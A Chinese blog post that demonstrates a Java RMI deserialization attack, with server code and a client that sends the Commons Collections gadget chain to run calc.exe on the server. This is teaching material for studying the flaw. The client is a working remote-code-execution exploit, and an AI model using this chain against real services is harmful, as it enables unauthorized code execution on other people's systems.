反序列化漏洞模拟

最新推荐文章于 2022-09-20 17:16:13 发布
最新推荐文章于 2022-09-20 17:16:13 发布
阅读量444 收藏
点赞数
分类专栏: java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leadseczgw01/article/details/122000609
版权

1.背景

今日头条

2.反序列化漏洞出现的环境

jdk1.7

commons-collections 3.1

      <dependency>
          <artifactId>commons-collections</artifactId>
          <groupId>commons-collections</groupId>
          <version>3.1</version>
      </dependency>

3.JAVA代码

Remote接口
import java.rmi.Remote;
import java.rmi.RemoteException;

/**
 * author: zhanggw
 * 创建时间:  2021/12/17
 */
public interface User extends Remote {

    void work(Object obj) throws RemoteException;

}

实现类

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

/**
 * author: zhanggw
 * 创建时间:  2021/12/17
 */
public class UserImpl extends UnicastRemoteObject implements User {

    protected UserImpl() throws RemoteException {
    }

    @Override
    public void work(Object obj) throws RemoteException {
        System.out.println(obj.toString());
        System.out.println("work被调用了");
    }

}

Registry
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * author: zhanggw
 * 创建时间:  2021/12/17
 */
public class RegistryServer {

    public static void main(String[] args) throws Exception {
        User user = new UserImpl();
        Registry registry = LocateRegistry.createRegistry(1099);
        registry.rebind("user", user);
        System.out.println("rmi running....");
    }

}

rmi客户端

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.rmi.Naming;
import java.util.HashMap;
import java.util.Map;

/**
 * author: zhanggw
 * 创建时间:  2021/12/17
 */
public class ClientDemo {
    public static void main(String[] args) throws Exception{
        String url = "rmi://192.168.1.106:1099/user";
        User userClient = (User) Naming.lookup(url);

        userClient.work(getPayload());
    }

    public static Object getPayload() throws Exception{
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);

        // Map map = new HashMap();
        Map<String, String> map = new HashMap<>();
        map.put("value", "sijidou");
        Map transformedMap = TransformedMap.decorate(map, null, transformerChain);

        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        ctor.setAccessible(true);
        return ctor.newInstance(Retention.class, transformedMap);
    }

}

4.模拟

先运行RegistryServer类

再运行 ClientDemo,运行后就会弹出RegistryServer所在电脑的计算器,原理是通过java rmi服务器远端在接收客户端序列化对象后,对该对象进行反序列化时,执行了被注入的病毒代码Runtime.getRuntime().exec("calc");

 

kenick
关注
专栏目录
log4j2 漏洞模拟
不要让任何事情成为你不去学习的理由。
12-13 2687
lookup 功能 log4j 提供了 lookup 功能,通过lookup 你可以在你的log4j 配置文件中添加你的变量值。最简单的你配置日志使用的日期格式 $${date:yyyy-MM} 就是通过datelookup 功能实现的。此外还有很多的lookup,比如 docker-lookup、env-lookup 等。 lookup 功能使得日志的配置更加灵活,但是提供的Jndi lookup 却暴露了重大的漏洞。 通过 jndi 你可以远程访问很多服务或接口。比如 ldap 、 RMI、...
探索BadLibrary:一个安全漏洞模拟库的创新实践
最新发布
gitblog_00003的博客
04-21 234
探索BadLibrary:一个安全漏洞模拟库的创新实践 项目地址:https://gitcode.com/SecureSkyTechnology/BadLibrary 在软件开发中,理解和预防安全漏洞是至关重要的。BadLibrary 是一个精心设计的项目,它提供了一系列含有常见编程错误和安全漏洞的代码示例。通过这个项目,开发者可以学习如何识别并修复这些隐患,从而提升他们的安全编码能力。 项目简...
JAVA_RMI反序列化远程命令执行漏洞验证
qq_44828901的博客
12-29 5265
简单复现 JAVA RMI反序列化
java rmi反序列化漏洞 简介
whatday的专栏
07-01 929
目录 一、RMI简介 二、RMI示例 三、漏洞复现 四、漏洞分析 1、为什么这里的badAttributeValueExpException对象是通过反射构造,而不是直接声明? 2、为什么不直接将badAttributeValueExpException对象bind到RMI服务? 一、RMI简介 首先看一下RMI在wikipedia上的描述: Java远程方法调用,即Java RMIJava Remote Method Invocation)是Java编程语言里,一种用于实现远程.
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞利用工具可能包含了一系列的payload(攻击载荷)和脚本,这些可以用来模拟攻击,检查JBOSS和WebLogic是否容易受到反序列化攻击。其中,JBOSS_EXP.jar可能是用于攻击JBOSS服务器的特定工具。 关于...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
java反序列化漏洞-验证.rar
06-25
压缩包内的“attackRMI.jar”可能是用来模拟远程方法调用(RMI)场景的,因为RMIJava反序列化漏洞的常见利用场景之一。RMI允许远程对象像本地对象一样被调用,但如果没有正确处理反序列化的对象,就可能成为攻击的...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
Java安全』反序列化-利用RMI重绑定rebind与动态代理机制构造恶意Remote对象触发CC1
Ho1aAs‘s Blog
12-18 776
# 原理 RMI在传输过程中:会将对象进行序列化反序列化,因此可能会带来安全隐患,这个被传输的对象是Remote类。那么只要构建恶意Remote对象即可在远程服务器触发反序列化漏洞。 **在Client端获取远程registery对象后,可以利用bind/rebind绑定一个包含反序列化漏洞Remote对象(Stub)**,Server端接收到bind/rebind后就会反序列化触发漏洞。 # 如何创建恶意的Remote对象? CC1触发中:由于AnnotationInvocationHandler
最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
巴胡子
08-13 6776
万万不可做坏事,仅为学习参考使用。 一、前提准备 1、所需条件: (1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备) 下载网址:https://www.kali.org/downloads/ 安装步骤请自行百度搜索,基础中的基础 (2)VMware虚拟机, 也可以用其他的虚拟机软件,如vmbox(免费的) 单个人感觉不如VMware好用 VMwawre下载网...
【web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
反序列化漏洞实例
buffedon的博客
06-10 1195
反序列化漏洞实例网页源码测试过程 网页源码 index.php <!DOCTYPE html> <body> <a href="../index.php">их╗п</a></body></html> <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_conte
linux中的链接符号
m0_55754984的博客
09-13 656
1.每个命令之间用;隔开 说明:各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.每个命令之间用&&隔开 说明:若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.每个命令之间用||隔开 说明:||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4. | 是管道符号。管道符号改变标准输入的源或者是标准输出的目的地。 5. & 是后台任务符号。
awvs结果分析漏洞模拟
weixin_34272308的博客
01-08 1359
2019独角兽企业重金招聘Python工程师标准>>> ...
shiro反序列化漏洞分析、模拟攻击及修复(一)
婷子的博客
12-16 1万+
实验概述 Apache Shiro 在 Java 的权限及安全验证框架中占用重要的一席之地,在它编号为550的 issue 中爆出严重的 Java 反序列化漏洞。下面,我们将首先搭建漏洞环境,模拟还原此漏洞的场景及分析,最后修补此漏洞。 实验内容 在windows环境中搭建shiro漏洞环境 分析漏洞原因 使用反弹shell利用漏洞模拟攻击 漏洞修复分析及方案 实验采用工具与环境 W...
JAVA反序列化漏洞浅析
谢公子的博客
12-20 9665
目录 反序列化漏洞 序列化反序列化 JAVA WEB中的序列化反序列化 对象序列化和反序列范例 JAVA中执行系统命令 重写readObject()方法 Apache Commons Collections 反序列化漏洞payload JAVA Web反序列化漏洞的挖掘和利用 由于本人并非JAVA程序员,所以对JAVA方面的知识不是很懂,仅仅是能看懂而已。本文参照几位大佬...
log4j远程注入漏洞模拟和详解
zchlove137的博客
12-21 4511
IT之家 12 月 10 日消息,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。IT之家获悉,由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊.
fastjson反序列化漏洞环境搭建
09-15
3. 创建一个 Java 类,用于模拟具有 fastjson 反序列化漏洞的场景。以下是一个简单的示例代码: ```java import com.alibaba.fastjson.JSON; public class FastjsonVulnerability { public static void main...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kenick

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值